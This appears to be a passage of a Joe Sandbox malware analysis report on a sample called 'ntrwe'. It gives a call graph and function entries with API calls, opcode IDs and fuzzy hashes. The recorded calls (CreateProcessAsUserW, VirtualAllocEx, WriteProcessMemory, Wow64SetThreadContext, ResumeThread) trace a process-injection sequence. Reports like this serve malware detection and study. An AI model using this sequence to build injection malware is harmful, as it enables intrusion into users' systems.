11086->11080 11087->11080 11088->11080 11090 40146c 11089->11090 11091 4015bc 11090->11091 11093 401420 2 API calls 11090->11093 11094 401430 2 API calls 11090->11094 11095 401582 2 API calls 11090->11095 11096 401569 2 API calls 11090->11096 11097 401679 2 API calls 11090->11097 11092 401626 11091->11092 11098 401ca8 2 API calls 11091->11098 11092->11057 11093->11090 11094->11090 11095->11090 11096->11090 11097->11090 11098->11091 11100 40146c 11099->11100 11101 4015bc 11100->11101 11103 401420 2 API calls 11100->11103 11104 401430 2 API calls 11100->11104 11105 401582 2 API calls 11100->11105 11106 401569 2 API calls 11100->11106 11107 401679 2 API calls 11100->11107 11102 401626 11101->11102 11108 401ca8 2 API calls 11101->11108 11102->11057 11103->11100 11104->11100 11105->11100 11106->11100 11107->11100 11108->11101 11110 401e11 11109->11110 11111 401e5b 11110->11111 11122 401f61 11110->11122 11111->11057 11115 401e11 11113->11115 11114 401e5b 11114->11057 11115->11114 11116 401f61 2 API calls 11115->11116 11116->11115 11118 401cd5 11117->11118 11119 401d2f 11118->11119 11120 401e00 2 API calls 11118->11120 11121 401df1 2 API calls 11118->11121 11119->11067 11120->11119 11121->11119 11123 401f81 11122->11123 11124 401fcb 11123->11124 11126 402010 11123->11126 11124->11110 11127 40203a 11126->11127 11128 402108 11127->11128 11130 402f68 11127->11130 11128->11123 11132 402f6d 11130->11132 11131 403060 11131->11128 11132->11131 11135 407b88 11132->11135 11141 407b98 11132->11141 11136 407ba4 11135->11136 11147 407ce9 11136->11147 11138 407bbe 11138->11132 11144 407ba4 11141->11144 11142 407bb7 11146 408515 CopyFileExW 11142->11146 11143 407bbe 11143->11132 11145 407ce9 DeleteFileW 11144->11145 11145->11142 11146->11143 11148 407d0c 11147->11148 11157 407dc8 11148->11157 11161 407db8 11148->11161 11149 407bb7 11152 408515 11149->11152 11153 408552 11152->11153 11169 40d080 11153->11169 11173 40d090 11153->11173 11154 408857 11154->11138 11158 407de8 11157->11158 11165 402f5c 11158->11165 11162 407de8 11161->11162 11163 402f5c DeleteFileW 11162->11163 11164 407e1a 11163->11164 11164->11149 11166 407e80 DeleteFileW 11165->11166 11168 407e1a 11166->11168 11168->11149 11170 40d0bd 11169->11170 11171 40d178 11170->11171 11177 40e132 11170->11177 11171->11154 11174 40d0bd 11173->11174 11175 40d178 11174->11175 11176 40e132 CopyFileExW 11174->11176 11175->11154 11176->11175 11178 40e13b 11177->11178 11179 40e199 11178->11179 11182 40e1a8 11178->11182 11186 40e1b8 11178->11186 11179->11171 11183 40e1d2 11182->11183 11190 408234 11183->11190 11187 40e1d2 11186->11187 11188 408234 CopyFileExW 11187->11188 11189 40e211 11188->11189 11189->11179 11192 40e230 CopyFileExW 11190->11192 11193 40e4e6 11192->11193 10952 d499d8 10953 d49a1c VirtualAllocEx 10952->10953 10955 d49a94 10953->10955 11194 d4a368 11195 d4a3ac ResumeThread 11194->11195 11197 d4a3f8 11195->11197

                                                                                          Executed Functions

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 d46ef0-d46f8b 2 d46fa2-d46fad 0->2 3 d46f8d-d46f9f 0->3 4 d46fc1-d46ffd 2->4 5 d46faf-d46fbe 2->5 3->2 6 d47011-d470ef CreateProcessAsUserW 4->6 7 d46fff-d4700e 4->7 5->4 11 d470f1-d470f7 6->11 12 d470f8-d471d6 6->12 7->6 11->12 22 d4720c-d47217 12->22 23 d471d8-d47201 12->23 23->22
                                                                                          APIs
                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00D470DC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208957070.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_d40000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcessUser
                                                                                          • String ID: HM^$HM^$HM^
                                                                                          • API String ID: 2217836671-1882769842
                                                                                          • Opcode ID: fdd9780cb9684f330182018345d8e3a9aa3bed1c70daadcc02e16276c7a05451
                                                                                          • Instruction ID: 595a5588ecd8726b55657221944ab848ab1725c517f35060c3e756246c261bb5
                                                                                          • Opcode Fuzzy Hash: fdd9780cb9684f330182018345d8e3a9aa3bed1c70daadcc02e16276c7a05451
                                                                                          • Instruction Fuzzy Hash: 1891CF74D0026D8FCB25CFA4C880BDDBBB5BF0A304F1494AAE548B7250DB709A99DF54
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 0040E4D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208424754.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyFile
                                                                                          • String ID:
                                                                                          • API String ID: 1304948518-0
                                                                                          • Opcode ID: a2dbb5b1da5ee3c6eaf2582639dea5c17c3e217dd318508f20cd46b39ed934fa
                                                                                          • Instruction ID: a25fde541b0990ae14eead17676c0b4b6dcde928963c2df4a6566852aa554a3d
                                                                                          • Opcode Fuzzy Hash: a2dbb5b1da5ee3c6eaf2582639dea5c17c3e217dd318508f20cd46b39ed934fa
                                                                                          • Instruction Fuzzy Hash: BDC1E074E00218DFDB24CFA9C985B9EBBB1BF49304F1485AAE818B7391D734A991CF45
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 0040E4D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208424754.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyFile
                                                                                          • String ID:
                                                                                          • API String ID: 1304948518-0
                                                                                          • Opcode ID: d84a9581065bea5ab9e85d75be22292cd936a720c9caa5b3987387942185a237
                                                                                          • Instruction ID: 996d41a502c5270074a87a85f35e698aa0e3f5c373d23518fb0d508d0efae300
                                                                                          • Opcode Fuzzy Hash: d84a9581065bea5ab9e85d75be22292cd936a720c9caa5b3987387942185a237
                                                                                          • Instruction Fuzzy Hash: 04B1F270D00218DFDB24CFA9C885B9EBBB1BF49304F1485AAE818B7391D734A991CF45
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D49D93
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208957070.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_d40000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 2ccfdf52a20c1f48aadbae073540c88eea5de387bdf3790370b06c24e98b6dcf
                                                                                          • Instruction ID: 9eee1178883e0c6441d629eec0ccfc8afe4b0b46261190b6e5482d9909d6cb1d
                                                                                          • Opcode Fuzzy Hash: 2ccfdf52a20c1f48aadbae073540c88eea5de387bdf3790370b06c24e98b6dcf
                                                                                          • Instruction Fuzzy Hash: 4F41A9B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE815B7200D378AA55CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D49D93
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208957070.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_d40000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 874ccf16aac35b90a849370b30c23be165b8769ca7365c504a10f890693283dc
                                                                                          • Instruction ID: 76121b078509031c3333c4778d825cd49786684acea0ebdda633be1b5917818f
                                                                                          • Opcode Fuzzy Hash: 874ccf16aac35b90a849370b30c23be165b8769ca7365c504a10f890693283dc
                                                                                          • Instruction Fuzzy Hash: 294199B4D012589FCF00CFA9D984ADEFBF1BB49314F24942AE818B7200D778AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00D49A82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208957070.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_d40000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 167fd68fb3f5019678719f1a27cb48ae77b042d8bdcdfc4d9a4479e45fcbfd11
                                                                                          • Instruction ID: a0c4fbb1b145f1719944c729265275a1b0ab76233a9345a7fa32f11497f5f617
                                                                                          • Opcode Fuzzy Hash: 167fd68fb3f5019678719f1a27cb48ae77b042d8bdcdfc4d9a4479e45fcbfd11
                                                                                          • Instruction Fuzzy Hash: DD41A9B4D002589FCF00CFA9D884ADEFBB1BB49310F24941AE815B7300D734A906CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00D49A82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208957070.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_d40000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 54d485fc1649ee51456e76df9b3d331be4b09f1964ed0537b9cef439c1780977
                                                                                          • Instruction ID: ee41c8d8c2a5cd5b6cdeb1d760f6cb285f247fa05c82467b2b7f5fb7a7592d55
                                                                                          • Opcode Fuzzy Hash: 54d485fc1649ee51456e76df9b3d331be4b09f1964ed0537b9cef439c1780977
                                                                                          • Instruction Fuzzy Hash: 113187B4D002589FCF10CFA9D884ADEFBB5BB49314F20982AE815B7310D775A956CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00403B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208424754.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 4decc518e0da377b898f33a34d53568fb5cd17897c5a8075945f91a8b8533851
                                                                                          • Instruction ID: 93d6db6ef0ae713389133533d0675b71a8832cc17db751da0328a59d8927c8f2
                                                                                          • Opcode Fuzzy Hash: 4decc518e0da377b898f33a34d53568fb5cd17897c5a8075945f91a8b8533851
                                                                                          • Instruction Fuzzy Hash: 5931ABB5D002589FCB10CFA9D884ADEFBB4BF59310F24946AE814B7310D374AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00407867
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208424754.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 5c0178b9ae5022c6440c50da2f62fc538367e5b93f726ddabf2d908cb149aac5
                                                                                          • Instruction ID: 4ed485b6e7c283b61669a766e61b3eca767f166269e6778fc3fb8cda9953bf52
                                                                                          • Opcode Fuzzy Hash: 5c0178b9ae5022c6440c50da2f62fc538367e5b93f726ddabf2d908cb149aac5
                                                                                          • Instruction Fuzzy Hash: F931AAB5D04258DFCB10CFA9E884ADEFBB0AF19310F24942AE814B7350D378A945CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00D4A1BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208957070.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_d40000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 894270c1f74ad1d04bbe753c7a3aa28d8cf30e2087a2f1d1598b529bb8245804
                                                                                          • Instruction ID: cc65d7e120ec22d7335ba6b73afb901c3924e7d486bbbde3fa4ba064b1e7627c
                                                                                          • Opcode Fuzzy Hash: 894270c1f74ad1d04bbe753c7a3aa28d8cf30e2087a2f1d1598b529bb8245804
                                                                                          • Instruction Fuzzy Hash: 5731ABB4D012589FDB10CFA9D884AEEFBF5BF49314F24842AE815B7240D778A945CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00403B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208424754.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 4670529e4b537c7b31dbd43569027dbd592e12fa8532319bb04755b9b3fffbb5
                                                                                          • Instruction ID: 80934176c27adbc385a1ee9e2b7af7973683f002dbca8c66790723d58ed8b7cc
                                                                                          • Opcode Fuzzy Hash: 4670529e4b537c7b31dbd43569027dbd592e12fa8532319bb04755b9b3fffbb5
                                                                                          • Instruction Fuzzy Hash: 1E3199B9D002589FCB10CFA9E484ADEFBB4BB19310F24942AE814B7310D778AA45CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00407867
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208424754.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 81250e7a398bdf78aa693b232e008a759b2b109f3e94def51b706a633161320e
                                                                                          • Instruction ID: be9c1567a6372c8686fe88d10e2c4c87c8dec8c7661e222eaf53d225362402ea
                                                                                          • Opcode Fuzzy Hash: 81250e7a398bdf78aa693b232e008a759b2b109f3e94def51b706a633161320e
                                                                                          • Instruction Fuzzy Hash: 8B3199B5D042589FCB10CFA9E484ADEFBB4BB49310F24942AE814B7350D378A945CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?), ref: 00407F19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208424754.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: eef6be215c2af5aab544100aabc9a75361bd039cf0cd29033cc7e879a2b0f48f
                                                                                          • Instruction ID: 5338ca48c365ce440c251ec3e8cc7a5e00dff2d6b96b2f7408fbb60489883439
                                                                                          • Opcode Fuzzy Hash: eef6be215c2af5aab544100aabc9a75361bd039cf0cd29033cc7e879a2b0f48f
                                                                                          • Instruction Fuzzy Hash: D931C9B4D052599FCB00CFA9D884AEEFBF0AF49314F24846AE404B7350D378AA46CB65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?), ref: 00407F19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208424754.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: d65ecbc264c0d449953e4c665bc42484ca3b724746d40a14be619a8a92b52672
                                                                                          • Instruction ID: 6926dff5acc281bdcabb680791c0c977b417990c41a17185d9170e3433c62a6d
                                                                                          • Opcode Fuzzy Hash: d65ecbc264c0d449953e4c665bc42484ca3b724746d40a14be619a8a92b52672
                                                                                          • Instruction Fuzzy Hash: FC31BBB4D05219DFCB10CFA9D884AEEFBF5EB49314F24846AE804B7350D378AA45CB95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 00D4A3E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208957070.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_d40000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 742367f0b1476d32235bbfbba9a94d5b12777d1a7ed1e44a9ab7373c738e5d6e
                                                                                          • Instruction ID: 7ee5ded3730b6567e6d7747c52c9134d0b706e2b85107ee03636eaef7e5ca0ac
                                                                                          • Opcode Fuzzy Hash: 742367f0b1476d32235bbfbba9a94d5b12777d1a7ed1e44a9ab7373c738e5d6e
                                                                                          • Instruction Fuzzy Hash: BB31CBB4D012189FCF14CFA9E884AEEFBB4AF49314F24982AE815B7310D774A945CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 00D4A3E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208957070.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_d40000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 08c67c9fe5139be5a6c562390a8f5cd4cb1d2e4da87654a9736e248ccad96b0f
                                                                                          • Instruction ID: 33f3a675fdd0c3f1fa8cacc6f2f65c008c71cc3f07f69d0f9bce0035f8dffdee
                                                                                          • Opcode Fuzzy Hash: 08c67c9fe5139be5a6c562390a8f5cd4cb1d2e4da87654a9736e248ccad96b0f
                                                                                          • Instruction Fuzzy Hash: 6C31A9B4D012189FCB14CFA9E884ADEFBB4AF49314F24982AE815B7300D774A945CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208253332.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_1bd000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 008624e6721af37ca87d904341ad95965ce65217efcf275d56816666e8fc1e74
                                                                                          • Instruction ID: 2c34493e17945344002cc905303bd10dca512c937d3fe7fc1652ae02b600d2c4
                                                                                          • Opcode Fuzzy Hash: 008624e6721af37ca87d904341ad95965ce65217efcf275d56816666e8fc1e74
                                                                                          • Instruction Fuzzy Hash: B0213775500204DFDB19DF50E9C4B9ABF65FB98324F30C6A9E8054B706D33AE846CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208253332.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_1bd000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f5b1c26b496722ab38e32de62b009e6bf907afc3eea9090af90032c1bbce1c23
                                                                                          • Instruction ID: 3a718bb6c50eec4177a7d4693afe9604468fa3f3347f2562c083559fc4c48387
                                                                                          • Opcode Fuzzy Hash: f5b1c26b496722ab38e32de62b009e6bf907afc3eea9090af90032c1bbce1c23
                                                                                          • Instruction Fuzzy Hash: 82213775500244DFCB29DF14E8C4BAABF75FB94318F30C5A9E8050B606D336E846CBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208253332.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_1bd000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c4ea56b3947d986341c0b6b7dda0973d1e11cfe72b5a075273c84b72da0e971e
                                                                                          • Instruction ID: 0e700eedfdbe78a94e6ba532f478c3c72289f36f925a187faaff241ce3d1173a
                                                                                          • Opcode Fuzzy Hash: c4ea56b3947d986341c0b6b7dda0973d1e11cfe72b5a075273c84b72da0e971e
                                                                                          • Instruction Fuzzy Hash: 7E11E676404280DFCF16CF14E5C4B56BF71FB94324F24C6A9D8094B616C33AE85ACBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208253332.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_1bd000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c4ea56b3947d986341c0b6b7dda0973d1e11cfe72b5a075273c84b72da0e971e
                                                                                          • Instruction ID: 7384319625c4bd8f07c028d696b591be38ca15d205f5b8d56d251ba5e3c93083
                                                                                          • Opcode Fuzzy Hash: c4ea56b3947d986341c0b6b7dda0973d1e11cfe72b5a075273c84b72da0e971e
                                                                                          • Instruction Fuzzy Hash: D9110876804280CFCF16CF14E5C4B5ABF71FB94314F24C6A9D8050B616C33AD856CBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208253332.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_1bd000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2d78207c1edc9bd7f592ca868909e368eb4a04921fbf6ad5a3e824097670dc6a
                                                                                          • Instruction ID: 4ea9f1eb4df0f112185f16989e6897e3f513cfc5629c411f42579bc7537d554f
                                                                                          • Opcode Fuzzy Hash: 2d78207c1edc9bd7f592ca868909e368eb4a04921fbf6ad5a3e824097670dc6a
                                                                                          • Instruction Fuzzy Hash: D401F7310043409EE7148A56DC88BE7BF9CDF51728F28C55AED045B282E7399C40C7B1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.2208253332.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_1bd000_ntrwe.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ea9fa1672fd7d9345e7f78e66dd027a6413424d48fd77671ebfe098d1f3572b
                                                                                          • Instruction ID: 7125d2486182f4c5d63dbf0a14dd86a9031bfaeec5dad723e1d9cdfff80fd9b3
                                                                                          • Opcode Fuzzy Hash: 6ea9fa1672fd7d9345e7f78e66dd027a6413424d48fd77671ebfe098d1f3572b
                                                                                          • Instruction Fuzzy Hash: 78F062724046449EE7148E16D888BA7FF98EB91734F28C55AED085B286D378AC44CBB1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions